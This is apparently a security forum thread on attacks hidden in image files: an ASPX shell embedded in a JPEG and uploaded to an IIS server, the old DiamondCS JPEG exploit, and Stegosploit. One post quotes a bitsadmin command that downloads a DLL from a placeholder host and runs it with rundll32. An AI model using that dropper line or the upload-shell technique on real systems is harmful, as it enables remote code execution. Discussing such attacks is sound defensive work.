I've checked only beginning. He updates attributes of jpeg file (using comment field) and puts active content (aspx shell) in it. Then he renames jpg to aspx and uploads it. Server accepts is. When viewing the modified picture shell executes. After that I guess it's game over.
Didn't see the video. @Minimalist, from your description this is an IIS problem? Sounds almost in the same vein as Shellshock, really. BTW Not sure the domain controller would dependably allow file uploads? I know very little about AD and LDAP on Windows. That said, environments where Linux or UNIX servers are administered from poorly secured Windows workstations tend to give me the willies...
From what I've seen at beginning I can't tel if problem is in IIS, Asp or problematic function/program. It's also only first step in exploit chain and shell is run under user rights.
Regarding malicious JPEGs, anyone remember this? http://web.archive.org/web/20050830222224/http://www.diamondcs.com.au/jpegscan/
Yes, I remember this! There was a long thread at DSLR where Wayne (owner of DiamondCS) demonstrated the technique of modifying a JPEG file. That exploit's payload was a file written to disk, which was an easy block for those who had such protection. I'm not sure exactly what is going on in this current exploit: Well, we don't know if this is true always or not: what types of other protection does the network have? (DiamondCS was a company ahead of its time in many ways. ProcessGuard and WormGuard were wonderful products -- some still use ProcessGuard.. I was evaluating different anti-executable products at that time, and was impressed with ProcessGuard.) ---- rich
A short time ago in another thread that asked about file types that can be used maliciously (too lazy to find it ATM), someone mentioned that many of those were not issues on up to date systems. Yet here we are again with file types one would assume to be safe being used as attack vectors again.
Inspired by Marcus Murray's presentation (https://vimeo.com/103938583), security researcher and developer of Bouncer, Florian Rienhardt has written a follow up on his blog which includes an adaptation to the presented method and was able to utilize Microsoft's built-in bitsadmin.exe to achieve similar execution of malicious downloads. Blog: http://bitnuts.de/ Research on bitsadmin.exe: Microsoft’s built in Malware Dropper? 2015/05/21 by Flo Code: cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0
Stegosploit hides malicious code in images, this is the future of online attacks http://securityaffairs.co/wordpress/37302/hacking/stegosploit-malware-images.html
Noscript et. al. could potentially work against that, due to the first stage JS needed to load the code embedded in the image. Also it still has to deliver an effective exploit, including a sandbox escape in the case of Chrome or IE. It'd be a heck of a vehicle for delivering the actual attack though.
Saumil Shah has said http://www.net-security.org/secworld.php?id=18443 http://motherboard.vice.com/read/how-you-can-get-hacked-just-by-looking-at-a-picture-online and of course that words can scary...but I found text on blog below and I think it lowers "charm" of Stegoploit https://medium.com/@christianbundy/why-stegosploit-isn-t-an-exploit-189b0b5261eb It's real danger or only researcher's mistake? BTW...below presentation of author http://conference.hitb.org/hitbsecc...il-Shah-Stegosploit-Hacking-with-Pictures.pdf